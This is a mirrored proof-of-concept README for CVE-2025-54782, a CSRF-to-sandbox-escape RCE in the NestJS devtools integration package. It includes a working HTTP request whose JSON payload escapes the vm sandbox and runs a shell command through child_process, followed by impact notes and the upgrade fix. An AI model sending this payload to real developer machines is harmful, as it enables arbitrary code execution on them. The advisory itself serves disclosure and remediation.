Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54782 PoC — @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers

Source
https://github.com/nitrixog/CVE-2025-54782
Associated Vulnerability
Title:@nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers (CVE-2025-54782)
Description:Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.
Description
NestJS DevTools Unauthenticated RCE
Readme
# CVE-2025-54782: Critical Bug in NestJS DevTools

🚨 **Critical Security Issue** - CVSS Score: 9.4/10

## Discovery

A critical security vulnerability was discovered in NestJS DevTools that allows attackers to execute arbitrary code on developers' machines through malicious websites. This represents a significant security risk as it can lead to complete system compromise.

## The Problem

**Affected Package:** `@nestjs/devtools-integration` version 0.2.0 and below  
**What Goes Wrong:** The package creates a local development server with insufficient security controls  
**Who's At Risk:** Any developer using NestJS DevTools in their local environment  

### How The Attack Works

When you have NestJS DevTools running, it starts a local server (usually on port 3000). This server has an endpoint at `/inspector/graph/interact` that's supposed to help with debugging. But here's the problem:

1. **Missing Access Controls** - Cross-origin requests are permitted to the local development server
2. **Inadequate Sandboxing** - The JavaScript execution sandbox can be bypassed
3. **Privilege Escalation** - Successful sandbox escape grants full system access

### Real Attack Example

A malicious website could send this request to your local NestJS server:

```http
POST /inspector/graph/interact HTTP/1.1
Content-Type: text/plain

{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami')}})()"}
```

This payload demonstrates:
- Sandbox escape via exception handling and constructor manipulation
- Process object access through prototype chain exploitation
- Command execution via child_process module

## Security Impact

- **Remote Code Execution** - Complete system compromise potential
- **Silent Exploitation** - Attacks occur without user awareness
- **Low Attack Complexity** - Simple web interaction triggers exploitation
- **Developer Targeting** - Could facilitate supply chain attacks on development environments

## Remediation

**Immediate Action Required:** Update the package:

```bash
npm update @nestjs/devtools-integration
```

**Verify Installation:**
```bash
npm ls @nestjs/devtools-integration
```

Ensure you're running version **0.2.1 or later**.

## Timeline

- Found the vulnerability while testing NestJS DevTools
- Reported it to the NestJS team
- They fixed it in version 0.2.1
- CVE-2025-54782 was assigned
- Now sharing this publicly to help other developers stay safe

## Official References

- [Socket.dev Blog Post](https://socket.dev/blog/nestjs-rce-vuln)
- [NestJS Security Advisory](https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7)
- [Official CVE Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-54782)

---
File Snapshot

 [4.0K]  /data/pocs/a68a3380498949698dbec692618df65edfea9373
└── [2.7K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →